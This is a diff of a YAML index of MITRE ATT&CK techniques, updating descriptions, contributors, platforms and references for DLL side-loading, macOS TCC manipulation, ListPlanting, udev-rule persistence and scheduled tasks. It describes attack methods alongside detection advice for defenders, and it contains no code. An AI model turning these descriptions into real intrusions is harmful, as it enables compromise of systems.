       description: |-
         Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -23605,12 +23887,11 @@ privilege-escalation:
         url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.002
     atomic_tests: []
   T1098.002:
     technique:
-      modified: '2024-01-03T15:46:06.706Z'
+      modified: '2024-10-15T15:37:25.303Z'
       name: 'Account Manipulation: Additional Email Delegate Permissions'
       description: "Adversaries may grant additional permission levels to maintain
         persistent access to an adversary-controlled email account. \n\nFor example,
@@ -23643,9 +23924,10 @@ privilege-escalation:
       x_mitre_contributors:
       - Microsoft Detection and Response Team (DART)
       - Mike Burns, Mandiant
-      - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
       - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
       - Arad Inbar, Fidelis Security
+      - Nilesh Dherange (Gurucul)
+      - Naveen Vijayaraghavan
       x_mitre_deprecated: false
       x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
         permissions changes that may indicate excessively broad permissions being
@@ -23662,9 +23944,8 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '2.1'
+      - Office Suite
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Group: Group Modification'
       - 'Application Log: Application Log Content'
@@ -23710,38 +23991,19 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.002
     atomic_tests: []
   T1548.006:
     technique:
-      modified: '2024-04-17T00:02:12.021Z'
+      modified: '2024-10-16T16:54:56.714Z'
       name: TCC Manipulation
-      description: "Adversaries can manipulate or abuse the Transparency, Consent,
-        & Control (TCC) service or database to execute malicious applications with
-        elevated permissions. TCC is a Privacy & Security macOS control mechanism
-        used to determine if the running process has permission to access the data
-        or services protected by TCC, such as screen sharing, camera, microphone,
-        or Full Disk Access (FDA).\n\nWhen an application requests to access data
-        or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database,
-        located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent),
-        for existing permissions. If permissions do not exist, then the user is prompted
-        to grant permission. Once permissions are granted, the database stores the
-        application's permissions and will not prompt the user again unless reset.
-        For example, when a web browser requests permissions to the user's webcam,
-        once granted the web browser may not explicitly prompt the user again.(Citation:
-        welivesecurity TCC)\n\nAdversaries may manipulate the TCC database or otherwise
-        abuse the TCC service to execute malicious content. This can be done in various
-        ways, including using privileged system applications to execute malicious
-        payloads or manipulating the database to grant their application TCC permissions.
-        \n\nFor example, adversaries can use Finder, which has FDA permissions by
-        default, to execute malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002)
-        while preventing a user prompt. For a system without System Integrity Protection
-        (SIP) enabled, adversaries have also manipulated the operating system to load
-        an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation:
-        TCC macOS bypass)(Citation: TCC Database)\n\nAdversaries may also opt to instead
-        inject code (e.g., [Process Injection](https://attack.mitre.org/techniques/T1055))
-        into targeted applications with the desired TCC permissions.\n"
+      description: |+
+        Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to grant malicious executables elevated permissions. TCC is a Privacy & Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA).
+
+        When an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), and an overwrites file (if connected to an MDM) for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC)
+
+        Adversaries may access restricted data or services protected by TCC through abusing applications previously granted permissions through [Process Injection](https://attack.mitre.org/techniques/T1055) or executing a malicious binary using another application. For example, adversaries can use Finder, a macOS native app with FDA permissions, to execute a malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002). When executing under the Finder App, the malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) inherits access to all files on the system without requiring a user prompt. When System Integrity Protection (SIP) is disabled, TCC protections are also disabled. For a system without SIP enabled, adversaries can manipulate the TCC database to add permissions to their malicious executable through loading an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database)
+
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -23749,6 +24011,8 @@ privilege-escalation:
         phase_name: privilege-escalation
       x_mitre_contributors:
       - Marina Liang
+      - Wojciech Reguła @_r3ggi
+      - Csaba Fitzl @theevilbit of Kandji
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -23756,7 +24020,7 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - macOS
-      x_mitre_version: '1.0'
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Modification'
@@ -23786,7 +24050,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.008:
     technique:
@@ -23832,7 +24095,7 @@ privilege-escalation:
         description: stderr. (2014, February 14). Detecting Userland Preload Rootkits.
           Retrieved December 20, 2017.
         source_name: Chokepoint preload rootkits
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:26:31.766Z'
       name: Ptrace System Calls
       description: "Adversaries may inject malicious code into processes via ptrace
         (process trace) system calls in order to evade process-based defenses as well
@@ -23877,8 +24140,6 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1037.001:
     technique:
@@ -23904,7 +24165,7 @@ privilege-escalation:
         url: http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/
         description: Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part
           18. Retrieved November 15, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T23:45:03.153Z'
       name: 'Boot or Logon Initialization Scripts: Logon Script (Windows)'
       description: "Adversaries may use Windows logon scripts automatically executed
         at logon initialization to establish persistence. Windows allows logon scripts
@@ -23930,59 +24191,28 @@ privilege-escalation:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
       - 'Windows Registry: Windows Registry Key Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1037.001
     atomic_tests: []
   T1055.015:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - ESET
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
-      type: attack-pattern
-      created: '2021-11-22T15:02:15.190Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1055.015
-        url: https://attack.mitre.org/techniques/T1055/015
-      - source_name: Microsoft List View Controls
-        url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
-        description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
-          January 4, 2022.
-      - source_name: Modexp Windows Process Injection
-        url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
-        description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
-          Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
-          Retrieved November 15, 2021.'
-      - source_name: ESET InvisiMole June 2020
-        url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
-        description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
-          HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-14T17:34:33.948Z'
       name: 'Process Injection: ListPlanting'
       description: "Adversaries may abuse list-view controls to inject malicious code
         into hijacked processes in order to evade process-based defenses as well as
         possibly elevate privileges. ListPlanting is a method of executing arbitrary
-        code in the address space of a separate live process. Code executed via ListPlanting
-        may also evade detection from security products since the execution is masked
-        under a legitimate process.\n\nList-view controls are user interface windows
-        used to display collections of items.(Citation: Microsoft List View Controls)
-        Information about an application's list-view settings are stored within the
-        process' memory in a <code>SysListView32</code> control.\n\nListPlanting (a
-        form of message-passing \"shatter attack\") may be performed by copying code
-        into the virtual address space of a process that uses a list-view control
-        then using that code as a custom callback for sorting the listed items.(Citation:
-        Modexp Windows Process Injection) Adversaries must first copy code into the
-        target process’ memory space, which can be performed various ways including
-        by directly obtaining a handle to the <code>SysListView32</code> child of
-        the victim process window (via Windows API calls such as <code>FindWindow</code>
+        code in the address space of a separate live process.(Citation: Hexacorn Listplanting)
+        Code executed via ListPlanting may also evade detection from security products
+        since the execution is masked under a legitimate process.\n\nList-view controls
+        are user interface windows used to display collections of items.(Citation:
+        Microsoft List View Controls) Information about an application's list-view
+        settings are stored within the process' memory in a <code>SysListView32</code>
+        control.\n\nListPlanting (a form of message-passing \"shatter attack\") may
+        be performed by copying code into the virtual address space of a process that
+        uses a list-view control then using that code as a custom callback for sorting
+        the listed items.(Citation: Modexp Windows Process Injection) Adversaries
+        must first copy code into the target process’ memory space, which can be performed
+        various ways including by directly obtaining a handle to the <code>SysListView32</code>
+        child of the victim process window (via Windows API calls such as <code>FindWindow</code>
         and/or <code>EnumWindows</code>) or other [Process Injection](https://attack.mitre.org/techniques/T1055)
         methods.\n\nSome variations of ListPlanting may allocate memory in the target
         process but then use window messages to copy the payload, to avoid the use
@@ -23999,6 +24229,9 @@ privilege-escalation:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_contributors:
+      - ESET
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitoring Windows API calls indicative of the various types
         of code injection may generate a significant amount of data and may not be
         directly useful for defense unless collected under specific circumstances
@@ -24013,21 +24246,52 @@ privilege-escalation:
         arguments.\n\nAnalyze process behavior to determine if a process is performing
         unusual actions, such as opening network connections, reading files, or other
         suspicious actions that could relate to post-compromise behavior. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Process: Process Modification'
       - 'Process: OS API Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
+      created: '2021-11-22T15:02:15.190Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1055/015
+        external_id: T1055.015
+      - source_name: Hexacorn Listplanting
+        description: Hexacorn. (2019, April 25). Listplanting – yet another code injection
+          trick. Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2019/04/25/listplanting-yet-another-code-injection-trick/
+      - source_name: ESET InvisiMole June 2020
+        description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
+          HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
+        url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
+      - source_name: Microsoft List View Controls
+        description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
+          January 4, 2022.
+        url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
+      - source_name: Modexp Windows Process Injection
+        description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
+          Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
+          Retrieved November 15, 2021.'
+        url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1055.015
     atomic_tests: []
   T1484:
     technique:
-      modified: '2024-04-19T04:27:31.884Z'
+      modified: '2024-10-15T15:55:32.946Z'
       name: Domain or Tenant Policy Modification
       description: "Adversaries may modify the configuration settings of a domain
         or identity tenant to evade defenses and/or escalate privileges in centrally
@@ -24072,9 +24336,8 @@ privilege-escalation:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - SaaS
-      x_mitre_version: '3.0'
+      - Identity Provider
+      x_mitre_version: '3.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Deletion'
       - 'Active Directory: Active Directory Object Creation'
@@ -24131,8 +24394,8 @@ privilege-escalation:
         url: https://wald0.com/?p=179
       - source_name: Harmj0y Abusing GPO Permissions
         description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
-          March 5, 2019.
-        url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+          September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
       - source_name: Sygnia Golden SAML
         description: Sygnia. (2020, December). Detection and Hunting of Golden SAML
           Attack. Retrieved January 6, 2021.
@@ -24141,7 +24404,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.008:
     technique:
@@ -24183,7 +24445,7 @@ privilege-escalation:
         Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem)
 
         Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:34:43.405Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Autostart Execution: LSASS Driver'
       x_mitre_detection: "With LSA Protection enabled, monitor the event logs (Events
@@ -24208,12 +24470,11 @@ privilege-escalation:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.008
     atomic_tests: []
   T1078.004:
     technique:
-      modified: '2024-03-29T15:42:13.499Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Cloud Accounts'
       description: "Valid accounts in cloud environments may allow adversaries to
         perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -24253,8 +24514,10 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
         or malicious behavior, such as accessing information outside of the normal
@@ -24262,13 +24525,13 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.7'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.8'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -24299,17 +24562,14 @@ privilege-escalation:
         url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.004
     atomic_tests: []
   T1053.002:
     technique:
-      modified: '2023-11-15T14:38:10.876Z'
+      modified: '2024-10-12T15:53:12.333Z'
       name: 'Scheduled Task/Job: At'
       description: |-
-        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
 
         On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the <code>at.allow</code> file. If the <code>at.allow</code> file does not exist, the <code>at.deny</code> file is checked. Every username not listed in <code>at.deny</code> is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the <code>at.deny</code> exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
 
@@ -24372,7 +24632,7 @@ privilege-escalation:
       - Windows
       - Linux
       - macOS
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Scheduled Job: Scheduled Job Creation'
@@ -24406,8 +24666,8 @@ privilege-escalation:
         url: https://man7.org/linux/man-pages/man1/at.1p.html
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Microsoft Scheduled Task Events Win10
         description: Microsoft. (2017, May 28). Audit Other Object Access Events.
           Retrieved June 27, 2019.
@@ -24416,6 +24676,10 @@ privilege-escalation:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Malicious Life by Cybereason
+        description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+          the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+        url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -24428,7 +24692,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.002
     atomic_tests: []
   T1055.001:
@@ -24531,9 +24794,67 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1055.001
     atomic_tests: []
+  T1546.017:
+    technique:
+      modified: '2024-11-11T19:05:38.708Z'
+      name: Udev Rules
+      description: |-
+        Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename.(Citation: Ignacio Udev research 2024)(Citation: Elastic Linux Persistence 2024)
+
+        Adversaries may abuse the udev subsystem by adding or modifying rules in udev rule files to execute malicious content. For example, an adversary may configure a rule to execute their binary each time the pseudo-device file, such as `/dev/random`, is accessed by an application. Although udev is limited to running short tasks and is restricted by systemd-udevd's sandbox (blocking network and filesystem access), attackers may use scripting commands under the action key `RUN+=` to detach and run the malicious content’s process in the background to bypass these controls.(Citation: Reichert aon sedexp 2024)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Eduardo González Hernández (@codexlynx)
+      - Eder Pérez Ignacio, @ch4ik0
+      - Wirapong Petshagun
+      - "@grahamhelton3"
+      - Ruben Groenewoud, Elastic
+      x_mitre_deprecated: false
+      x_mitre_detection: 'Monitor file creation and modification of Udev rule files
+        in `/etc/udev/rules.d/`, `/lib/udev/rules.d/`, and /usr/lib/udev/rules.d/,
+        specifically the `RUN` action key commands.(Citation: Ignacio Udev research
+        2024) '
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'File: File Modification'
+      type: attack-pattern
+      id: attack-pattern--f4c3f644-ab33-433d-8648-75cc03a95792
+      created: '2024-09-26T17:02:09.888Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1546/017
+        external_id: T1546.017
+      - source_name: Ignacio Udev research 2024
+        description: Eder P. Ignacio. (2024, February 21). Leveraging Linux udev for
+          persistence. Retrieved September 26, 2024.
+        url: https://ch4ik0.github.io/en/posts/leveraging-Linux-udev-for-persistence/
+      - source_name: Elastic Linux Persistence 2024
+        description: Ruben Groenewoud. (2024, August 29). Linux Detection Engineering
+          -  A Sequel on Persistence Mechanisms. Retrieved October 16, 2024.
+        url: https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms
+      - source_name: Reichert aon sedexp 2024
+        description: 'Zachary Reichert. (2024, August 19). Unveiling "sedexp": A Stealthy
+          Linux Malware Exploiting udev Rules. Retrieved September 26, 2024.'
+        url: https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1546.007:
     technique:
       x_mitre_platforms:
@@ -24569,7 +24890,7 @@ privilege-escalation:
         Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at <code>HKLM\SOFTWARE\Microsoft\Netsh</code>.
 
         Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T17:09:17.363Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Event Triggered Execution: Netsh Helper DLL'
       x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes
@@ -24593,12 +24914,11 @@ privilege-escalation:
       - SYSTEM
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.007
     atomic_tests: []
   T1574.004:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-03-30T21:01:39.601Z'
       name: Dylib Hijacking
       description: |-
         Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with <code>@rpath</code>, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable.  Additionally, if weak linking is used, such as the <code>LC_LOAD_WEAK_DYLIB</code> function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
@@ -24682,11 +25002,10 @@ privilege-escalation:
         url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1078.003:
     technique:
-      modified: '2023-07-14T13:04:04.591Z'
+      modified: '2024-10-15T16:36:36.681Z'
       name: 'Valid Accounts: Local Accounts'
       description: "Adversaries may obtain and abuse credentials of a local account
         as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -24738,9 +25057,8 @@ privilege-escalation:
         external_id: T1078.003
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.003
     atomic_tests: []
   T1574.012:
@@ -24789,7 +25107,7 @@ privilege-escalation:
         url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
         description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
           Profilers. Retrieved June 24, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-30T21:35:12.049Z'
       name: 'Hijack Execution Flow: COR_PROFILER'
       description: |-
         Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -24827,30 +25145,29 @@ privilege-escalation:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1574.012
     atomic_tests: []
 execution:
   T1053.005:
     technique:
-      modified: '2023-11-15T14:33:53.354Z'
+      modified: '2024-10-13T16:13:47.770Z'
       name: 'Scheduled Task/Job: Scheduled Task'
       description: "Adversaries may abuse the Windows Task Scheduler to perform task
         scheduling for initial or recurring execution of malicious code. There are
         multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
         utility can be run directly on the command line, or the Task Scheduler can
         be opened through the GUI within the Administrator Tools section of the Control
-        Panel. In some cases, adversaries have used a .NET wrapper for the Windows
-        Task Scheduler, and alternatively, adversaries have used the Windows netapi32
-        library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
-        utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
-        though <code>at.exe</code> can not access tasks created with <code>schtasks</code>
